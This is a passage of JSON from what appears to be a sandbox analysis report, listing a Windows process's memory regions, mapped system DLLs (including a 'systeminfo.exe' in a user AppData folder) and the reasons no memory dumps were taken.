dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2648", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:02:03.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_2649", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:02:03.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_2650", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:02:03.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_2651", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:02:03.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4124671, "entry_point": 4004000, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe", "id": "region_2652", "name": "systeminfo.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "region_type": "memory_mapped_file", "start_va": 3997696, "timestamp": "00:02:03.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1996066815, "entry_point": 1994326016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2653", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:02:03.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1996292096, "type": "region", "version": 1 }, "end_va": 1997864959, "entry_point": 1996292096, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2654", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996292096, "timestamp": "00:02:03.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2655", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2656", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2657", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2658", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2659", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2660", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2661", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:02:03.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_2662", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:02:03.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1936719872, "type": "region", "version": 1 }, "end_va": 1936752639, "entry_point": 1936728312, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2663", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1936719872, "timestamp": "00:02:03.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2664", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:02:03.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2665", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:02:03.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1992097792, "type": "region", "version": 1 }, "end_va": 1993121791, "entry_point": 0, "filename": null, "id": "region_2666", "name": "private_0x0000000076bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1992097792, "timestamp": "00:02:03.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1993146368, "type": "region", "version": 1 }, "end_va": 1994321919, "entry_point": 0, "filename": null, "id": "region_2667", "name": "private_0x0000000076cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1993146368, "timestamp": "00:02:03.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2668", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:02:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2584575, "entry_point": 2162688, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2669", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:02:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_2670", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:02:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7208959, "entry_point": 0, "filename": null, "id": "region_2671", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:02:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1935933440, "type": "region", "version": 1 }, "end_va": 1936265215, "entry_point": 1936103564, "filename": "\\Windows\\SysWOW64\\winspool.drv", "id": "region_2672", "name": "winspool.drv", "norm_filename": "c:\\windows\\syswow64\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1935933440, "timestamp": "00:02:03.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1936326656, "type": "region", "version": 1 }, "end_va": 1936531455, "entry_point": 1936340977, "filename": "\\Windows\\SysWOW64\\winmm.dll", "id": "region_2673", "name": "winmm.dll", "norm_filename": "c:\\windows\\syswow64\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1936326656, "timestamp": "00:02:03.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1936588800, "type": "region", "version": 1 }, "end_va": 1936670719, "entry_point": 1936593728, "filename": "\\Windows\\SysWOW64\\msacm32.dll", "id": "region_2674", "name": "msacm32.dll", "norm_filename": "c:\\windows\\syswow64\\msacm32.dll", "region_type": "memory_mapped_file", "start_va": 1936588800, "timestamp": "00:02:03.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1957822464, "type": "region", "version": 1 }, "end_va": 1957871615, "entry_point": 1957826785, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2675", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1957822464, "timestamp": "00:02:03.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958281215, "entry_point": 1957995443, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2676", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:02:03.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958637567, "entry_point": 1958386598, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2677", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:02:03.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1960378368, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960462821, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2678", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1960378368, "timestamp": "00:02:03.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1962147839, "entry_point": 1961112275, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2679", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:02:03.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1962475520, "type": "region", "version": 1 }, "end_va": 1963118591, "entry_point": 1962688471, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2680", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1962475520, "timestamp": "00:02:03.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1963130880, "type": "region", "version": 1 }, "end_va": 1963171839, "entry_point": 1963144864, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2681", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1963130880, "timestamp": "00:02:03.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1963196416, "type": "region", "version": 1 }, "end_va": 1964244991, "entry_point": 1963308781, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2682", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1963196416, "timestamp": "00:02:03.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1964769280, "type": "region", "version": 1 }, "end_va": 1966194687, "entry_point": 1965079101, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2683", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1964769280, "timestamp": "00:02:03.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1979121664, "type": "region", "version": 1 }, "end_va": 1980104703, "entry_point": 1979188585, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2684", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1979121664, "timestamp": "00:02:03.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1984167936, "type": "region", "version": 1 }, "end_va": 1984753663, "entry_point": 1984184241, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2685", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1984167936, "timestamp": "00:02:03.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1984757760, "type": "region", "version": 1 }, "end_va": 1985347583, "entry_point": 1984848707, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2686", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1984757760, "timestamp": "00:02:03.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1987051520, "type": "region", "version": 1 }, "end_va": 1987338239, "entry_point": 1987081336, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2687", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1987051520, "timestamp": "00:02:03.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1991245824, "type": "region", "version": 1 }, "end_va": 1991950335, "entry_point": 1991287922, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2688", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1991245824, "timestamp": "00:02:03.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1991966720, "type": "region", "version": 1 }, "end_va": 1992069119, "entry_point": 1991985525, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2689", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1991966720, "timestamp": "00:02:03.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2690", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:02:03.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2691", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:02:03.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8814591, "entry_point": 0, "filename": null, "id": "region_2692", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:02:03.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1964638207, "entry_point": 1964316047, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2693", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:02:03.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1984151551, "entry_point": 1983321739, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2694", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:02:03.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_2695", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:02:03.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_2696", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:02:03.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 917503, "entry_point": 0, "filename": null, "id": "region_2697", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:02:03.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 10424319, "entry_point": 0, "filename": null, "id": "region_2698", "name": "pagefile_0x0000000000870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8847360, "timestamp": "00:02:03.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_2699", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:02:03.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 34402303, "entry_point": 31457280, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2700", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31457280, "timestamp": "00:02:03.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1934098432, "type": "region", "version": 1 }, "end_va": 1934622719, "entry_point": 1934178249, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_2701", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1934098432, "timestamp": "00:02:03.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_2702", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:02:03.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6942719, "entry_point": 0, "filename": null, "id": "region_2703", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:02:03.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_2704", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:02:03.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 974847, "entry_point": 0, "filename": null, "id": "region_2705", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:02:03.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4001792, "start_va": 34406400, "type": "region", "version": 1 }, "end_va": 38408191, "entry_point": 0, "filename": null, "id": "region_2706", "name": "private_0x00000000020d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34406400, "timestamp": "00:02:03.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 57344, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1040383, "entry_point": 0, "filename": null, "id": "region_2707", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:02:03.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_2708", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:02:03.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 